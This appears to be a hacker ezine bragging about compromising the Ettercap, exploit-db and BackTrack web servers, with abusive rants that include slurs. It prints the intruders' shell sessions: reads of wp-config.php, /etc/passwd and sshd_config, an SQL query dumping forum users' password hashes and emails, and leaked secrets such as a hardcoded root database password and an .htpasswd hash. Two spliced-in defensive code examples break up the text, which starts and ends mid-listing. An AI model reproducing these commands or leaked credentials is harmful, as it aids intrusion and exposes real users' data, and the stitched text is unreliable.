n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php -r-xr-xr-x 1 
n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes -rwxrwxrwx 1 n3tw0rkTeRr0r15M inj3ct0r 19444 Sep 26 12:27 index.php dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 Jun 29 15:33 newthread.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php -r-xr-xr-x 
1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 printthread.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 15:35 report.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M 
,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/

~ ettercap ~

You would think that the authors of Ettercap, one of the most popular whitehat pentesting tools, would know the basics of security. Apparently they don't, or they just don't give a shit about what happens to their users.

So, why is their website so insecure? Ettercap's message board is hosted at Sourceforge, so they share a server with thousands of other customers. Every single customer is able to execute commands and access the other project directories. Pretty stupid, eh? You only need to find one hole in one hosted site and you can access ALL the project databases. Of course that isn't ALoR's fault, it's Sourceforge's fault. Regardless, people who care about security and data integrity wouldn't use such a shitty provider, would they?

To be fair, the Ettercap project is dead. Most of the admins have been inactive for a few years now, but that is no excuse for such a security mess. Especially since the server was compromised some five years ago. Just look at the process list, horrible. Even the worst perl bots (scax) get access. If such a poorly written bot can own this box, everyone can.

Some good advice to all other people/projects who are using Sourceforge: Move. There are enough good alternatives. Yes, I am talking to you Vim, get the fuck out of there.

And to all Ettercap users: ARP poisoning is *not* hacking. If you want to achieve something real, learn the fundamentals and not how to use a GUI. Don't sniff the passwords of your friends and call yourself a pentester (looking at you Firesheep).

Baa. I flood SID's. I'm a Hacker!!
Baa. I sit at starbucks, I sniff packets. I'm a Hacker!!

YOU'RE ALL FUCKING SHEEP. STOP BEING SHEEP! FUCKING INNOVATE!
$ uname -a
Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)

$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email, phpbb_ranks.rank_title
  FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank_id
  WHERE user_rank > 0 ORDER BY user_rank
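An added example, not part of the original text: a permission audit that the operator of a shared web host could run to see what a non-owner identity can reach in each customer's directory, which is the exposure the ettercap section describes. The directory layout, the SENSITIVE name list and all function names are assumptions made for this illustration.

```python
"""Audit a shared-hosting tree for cross-tenant exposure (added, illustrative example)."""
import os
import stat
import tempfile

# Assumed list of file names that usually hold credentials on PHP hosting.
SENSITIVE = {"config.php", "db.php", ".htpasswd"}


def class_bits(st, uid, gids):
    """Return the rwx triplet POSIX applies to identity (uid, gids) for this inode."""
    if st.st_uid == uid:
        return (st.st_mode >> 6) & 7
    if st.st_gid in gids:
        return (st.st_mode >> 3) & 7
    return st.st_mode & 7


def audit(root, uid, gids=frozenset()):
    """List what a non-owner identity can reach below each tenant directory in root.

    The auditor itself must be able to read the tree (run it as the host admin).
    Search permission (x) alone counts as reachable: a directory with mode --x
    hides its listing but still lets well-known names such as
    htdocs/config.php be opened directly.
    """
    findings = []

    def visit(path, rel):
        st = os.lstat(path)  # lstat: never follow tenant-controlled symlinks
        bits = class_bits(st, uid, gids)
        if stat.S_ISDIR(st.st_mode):
            if not bits & 1:
                return  # no search bit: nothing below is reachable
            if bits & 2 and not st.st_mode & stat.S_ISVTX:
                findings.append(("writable-dir", rel))
            for name in sorted(os.listdir(path)):
                visit(os.path.join(path, name), rel + "/" + name)
        elif stat.S_ISREG(st.st_mode):
            if bits & 2:
                findings.append(("writable-file", rel))
            if bits & 4 and os.path.basename(path) in SENSITIVE:
                findings.append(("readable-secret", rel))

    for tenant in sorted(os.listdir(root)):
        visit(os.path.join(root, tenant), tenant)
    return findings


# Constructed sample layout (path, mode); a trailing "/" marks a directory.
SAMPLE = [
    ("alpha/", 0o711), ("alpha/htdocs/", 0o755),
    ("alpha/htdocs/config.php", 0o644), ("alpha/htdocs/index.php", 0o777),
    ("beta/", 0o750), ("beta/htdocs/", 0o755), ("beta/htdocs/config.php", 0o644),
    ("gamma/", 0o711), ("gamma/.htpasswd", 0o640),
    ("gamma/htdocs/", 0o711), ("gamma/htdocs/config.php", 0o600),
    ("temp/", 0o777),
]


def build_sample(root):
    """Create the constructed layout above under root."""
    for rel, mode in SAMPLE:
        path = os.path.join(root, rel.rstrip("/"))
        if rel.endswith("/"):
            os.mkdir(path)
        else:
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        os.chmod(path, mode)  # explicit chmod so the umask does not interfere


def demo():
    """Audit the sample as (a) an unrelated tenant and (b) a member of the files' group."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        st = os.lstat(os.path.join(root, "alpha"))
        foreign_uid = st.st_uid + 1  # any uid that does not own the files
        as_other = audit(root, foreign_uid)
        as_group = audit(root, foreign_uid, {st.st_gid})
    return as_other, as_group


if __name__ == "__main__":
    for label, result in zip(("other tenant", "shared group"), demo()):
        print(label)
        for kind, rel in result:
            print("  %-16s %s" % (kind, rel))
```

Passing the web server's own uid and groups as the identity shows what any hosted script can read when every site executes under one shared account.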
____________________________________________________|_._._._._._._._,
\___________________________________________________|_|_|_|_|_|_|_|_|
! ~ exploit-db ~

Now we come to a different topic. A topic about people who leech off what the scene creates and call it their own. About people who copyright ideas and papers about security related topics that have been around for years. How many XSS-Papers are there currently on exploit-db? How many retarded strcpy(buf, argv[1])-papers are being written over and over again? About whitehats who think releasing exploits would make the world much more safe. And because of fame. They all want fame so badly that they do anything and everything in order to be part of the security industry.

What's even more hilarious is that these "famous" security people keep getting owned. We mean el8, phc, h0no, and zf0 have all owned these "Security Rockstar" faggots and yet, nothing changes. Or the attacks are categorized as "skiddy" behavior. It's ridiculous how terrible the industry is. There is no accountability anymore.

Still there are some lame skids that need a good spanking. Stupid 10 year olds who take perl-exploits to destroy clan-pages for fun and call themselves "hackers" without knowing what they are doing. Criminals who take exploits to steal payment stuff for their own selfish financial gain.
And to get their friends thrown in jail (soup). Fame and money... Get the message?

$ uname -a
Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www
$ ls -la
$ cat wp-config.php
$ cat /etc/passwd
$ cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
$ cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
$ cd /home
$ ls -la
total 12
drwxr-xr-x  3 root   root   4096 Aug  3 11:48 .
drwxr-xr-x 26 root   root   4096 Nov 30 06:53 ..
drwxr-xr-x  7 emgent emgent 4096 Aug  7 07:45 emgent
$ cd emgent
$ ls -la
total 48
drwxr-xr-x  7 emgent emgent 4096 Aug  7 07:45 .
drwxr-xr-x  3 root   root   4096 Aug  3 11:48 ..
-rw-------  1 emgent emgent  259 Oct 18 11:39 .bash_history
-rw-r--r--  1 emgent emgent  220 Aug  3 11:48 .bash_logout
-rw-r--r--  1 emgent emgent 3103 Aug  3 11:48 .bashrc
drwx------  2 emgent emgent 4096 Aug  3 11:49 .cache
drwx------  2 emgent emgent 4096 Aug  3 11:49 .irssi
-rw-------  1 emgent emgent    9 Aug  3 11:50 .nano_history
-rw-r--r--  1 emgent emgent  675 Aug  3 11:48 .profile
drwxr-xr-x  2 emgent emgent 4096 Aug  3 11:49 .ssh
drwxr-xr-x  3 emgent emgent 4096 Aug  7 07:45 .subversion
drwxr-xr-x  4 emgent emgent 4096 Aug  7 07:46 exploitdb
$ cd .ssh
$ ls
authorized_keys
$ cat authorized_keys
$ ps aux
$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              48G   17G   29G  37% /
none                  3.0G  172K  3.0G   1% /dev
none                  3.0G     0  3.0G   0% /dev/shm
none                  3.0G   56K  3.0G   1% /var/run
none                  3.0G     0  3.0G   0% /var/lock
none                  3.0G     0  3.0G   0% /lib/init/rw
none                   48G   17G   29G  37% /var/lib/ureadahead/debugfs

Wordpress:
,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/
~ backtrack ~ !

Since we already tapped into exploit-db and their server lies in the same subnet with backtrack, we decided to check out their mad security. Backtrack is run by muts, the same guy who also administers exploit-db, so no wonder why it was super easy to get a shell...

$ uname -a
Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0
$ alias ls="ls -la"
$ ls
$ cat /etc/issue
Fedora release 12 (Constantine)
Kernel \r on an \m (\l)
$ cat /etc/passwd
$ cd /var/www/html/
$ ls
$ cat wp-config.php
$ cat stats.txt
BackTrack 4 - 4916323 downloads
$ cat download.php
EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!
function getRealIpAddr()
{
  if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
  {
    $ip=$_SERVER['HTTP_CLIENT_IP'];
  }
  elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
  {
    $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
  }
  else
  {
    $ip=$_SERVER['REMOTE_ADDR'];
  }
  return $ip;
}

$ip=getRealIpAddr();
$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";

function choose($iso) {
  $num = Rand (1,5);
  switch ($num)
  {
    case 1:
      $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
      break;
    case 2:
      $link="http://ftp.uio.no/pub/security/backtrack/$iso";
      break;
    case 3:
      $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
      break;
    case 4:
      $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
      break;
    case 5:
      $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
      break;
    // case 6:
    // $link="http://moon.backtrack-linux.org/downloads/$iso";
    // break;
  }
  return $link;
}

$version=$_GET["fname"];

if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))
{
  echo "This page cannot be accessed directly.";
  exit;
}

if ($version=="bt4r2") {
  $iso="bt4-r2.iso";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}

if ($version=="bt4r2vm") {
  $iso="bt4-r2-vm.tar.bz2";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}

if ($version=="bt4f") {
  $iso="bt4-final.iso";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt4fvm") {
  $iso="bt4-final-vm.zip";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt4r1") {
  $iso="bt4-r1.iso";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt4r1vm") {
  $iso="bt4-r1-vm.tar.bz2";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt4pf") {
  $iso="bt4-pre-final.iso";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt4b") {
  $iso="bt4-beta.iso";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt4bvm") {
  $iso="bt4-beta-vm-6.5.1.rar";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
elseif ($version=="bt3") {
  $iso="bt3-final.iso";
  $link=choose($iso);
  mysql_connect("localhost",$username,$password);
  @mysql_select_db($database) or die( "Unable to select database");
  $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  mysql_query($query);
  mysql_close();
  header( "Location: $link ");
  exit;
}
else {
  exit;
}
?>
$ cat s.php
$ cd wiki
$ ls
total 700
drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 .
drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 ..
-rw-r--r--. 1 apache apache 23 Nov 14 16:01 .htpasswd
-rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING
-rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS
-rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ
-rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY
-rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT
-rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL
-rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php
-rw-r--r--. 1 apache apache 3649 Nov 11 2008 README
-rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES
-rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample
-rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE
drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense
-rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php
-rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin
-rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache
drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config
drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs
drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions
drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images
-rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php
-rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5
drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes
-rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php
-rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5
drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages
drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math
-rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5
-rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php
-rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php
-rw-r--r--. 1 apache apache 31 Feb 3 2008 redirect.php5
-rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized
-rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml
drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins
-rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php
-rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5
-rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php
-rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5
-rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml
$ cat .htpasswd
edbadmin:YE8mle4nG1Z.c
cd ..
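Added example, not part of the ezine or of the dumped site's code: the download.php shown above takes the client address from the Client-IP / X-Forwarded-For request headers and pastes it into the INSERT string, and it connects to MySQL as root with the password stored in the file. A hardened version of the same redirect-and-count logic follows; the column names ip and version, the environment variable names COUNTER_DB_USER and COUNTER_DB_PASS and the unweighted mirror choice are assumptions.

```php
<?php
// Added example (not the site's code): the download.php logic with the same
// result for valid requests, minus the header trust and the string-built SQL.
declare(strict_types=1);

// Single allow-list: accepted fname value => file name (values from the dump).
const RELEASES = [
    'bt4r2'   => 'bt4-r2.iso',
    'bt4r2vm' => 'bt4-r2-vm.tar.bz2',
    'bt4f'    => 'bt4-final.iso',
    'bt4fvm'  => 'bt4-final-vm.zip',
    'bt4r1'   => 'bt4-r1.iso',
    'bt4r1vm' => 'bt4-r1-vm.tar.bz2',
    'bt4pf'   => 'bt4-pre-final.iso',
    'bt4b'    => 'bt4-beta.iso',
    'bt4bvm'  => 'bt4-beta-vm-6.5.1.rar',
    'bt3'     => 'bt3-final.iso',
];

// Mirror base URLs from the dump; the original's 3-in-5 weighting of the
// last mirror is not reproduced.
const MIRRORS = [
    'ftp://ftp.uio.no/pub/security/backtrack/',
    'http://ftp.uio.no/pub/security/backtrack/',
    'http://ftp.halifax.rwth-aachen.de/backtrack/',
];

/** Address of the TCP peer; request headers are never consulted. */
function clientIp(array $server): string
{
    // HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are request headers, so their
    // content is chosen by the sender. Behind a reverse proxy, accept a
    // forwarded address only when REMOTE_ADDR is that proxy.
    $ip = $server['REMOTE_ADDR'] ?? '';
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : '0.0.0.0';
}

/** Redirect target for a request, or null when fname is not on the list. */
function resolveDownload(array $get): ?string
{
    $key = $get['fname'] ?? null;
    if (!is_string($key) || !array_key_exists($key, RELEASES)) {
        return null;
    }
    return MIRRORS[random_int(0, count(MIRRORS) - 1)] . RELEASES[$key];
}

/** Counter insert with bound parameters; the column names are assumed. */
function recordDownload(PDO $db, string $ip, string $version): void
{
    $stmt = $db->prepare(
        'INSERT INTO downloadss (ip, version) VALUES (:ip, :version)'
    );
    $stmt->execute([':ip' => $ip, ':version' => $version]);
}

if (PHP_SAPI === 'cli') {
    // Constructed sample requests, so the file can be run offline.
    $forged = [
        'REMOTE_ADDR'          => '203.0.113.7',
        'HTTP_X_FORWARDED_FOR' => 'not-an-ip", "anything',
    ];
    var_dump(clientIp($forged));
    var_dump(resolveDownload(['fname' => 'bt4r2']));
    var_dump(resolveDownload(['fname' => 'bt4r2.iso']));
    exit(0);
}

$link = resolveDownload($_GET);
if ($link === null) {
    http_response_code(400);
    exit('This page cannot be accessed directly.');
}

// Credentials come from the environment (hypothetical variable names) and
// belong to an account limited to INSERT on the counter table.
$db = new PDO(
    'mysql:host=localhost;dbname=counter;charset=utf8mb4',
    getenv('COUNTER_DB_USER') ?: '',
    getenv('COUNTER_DB_PASS') ?: '',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
     PDO::ATTR_EMULATE_PREPARES => false]
);
recordDownload($db, clientIp($_SERVER), $_GET['fname']);
header('Location: ' . $link);
exit;
```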
cat forums/includes/config.php
/proc/vz/vzaquota/00000045/aquota.group
lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
drwx--x--x 3 root root 4096 Nov 13 09:00 backup
drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin
drwxr-xr-x 2 root root 4096 Jan 26 2010 boot
drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev
drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc
drwx--x--x 8 root root 4096 Nov 14 07:11 home
drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib
drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64
drwxr-xr-x 2 root root 4096 Jan 26 2010 media
drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt
drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt
dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc
drwxr-x--- 14 root root 4096 Dec 8 21:36 root
drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin
drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts
drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux
drwxr-xr-x 2 root root 4096 Jan 26 2010 srv
drwxr-xr-x 3 root root 0 Nov 30 02:12 sys
drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp
drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr
drwxr-xr-x 22 root root 4096 Nov 11 18:01 var
$ ls -la /home/freehack/public_html
total 3100
drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 .
drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 ..
